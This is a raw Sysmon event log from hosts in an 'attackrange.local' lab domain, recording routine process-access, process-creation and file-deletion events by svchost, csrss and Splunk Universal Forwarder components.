08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.281{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.922{466BC892-F6B3-60EB-A47D-00000000CF01}100965696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=846E5D90F569D4FB6D810CC5EA7E36E5,SHA256=CE6804D37F10EFF11A5B2C44DE00E3B2CA172CF4AA7B1048AC4A5697C27507EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:51.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F55D52A8119589E2877CFCE56FF11228,SHA256=78C845FC3BBC7A47C4416E50192FD9885590297D208DFAF93F23FAE3116293B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.568{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.552{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.553{466BC892-F6B3-60EB-A47D-00000000CF01}10096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.321{466BC892-F6B2-60EB-A37D-00000000CF01}17245004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.301{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB978A43D81B42E4F7DEBE5EC43F715,SHA256=BBBB2592A601F2C8B4E06274AAE5AECEF3C4E074EAB2B8343BE4E00C86F1293E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:51.297{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDD00ECA18B7C0D84984D79A8D33DF69,SHA256=7025232E94F8A4E5B9CD8AA0A15B5496777938ED243758A61B21161BEAB47DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:52.699{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553406FE6E4D2EDC5169A28CD3BD77D2,SHA256=020FC40C78DC1AAFDB1A1F0BB153FCFEBEBAD4BF11AF17633B1176917EF5B597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=095B89E2CA38AC7EE03E832BB46756DD,SHA256=B7D6658DAA11CA25D05827CF761C5EC3E567FEB5DCFDC3C27757260ACE938C5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.571{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB978A43D81B42E4F7DEBE5EC43F715,SHA256=BBBB2592A601F2C8B4E06274AAE5AECEF3C4E074EAB2B8343BE4E00C86F1293E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.436{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.434{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.434{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:52.418{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B4-60EB-A57D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 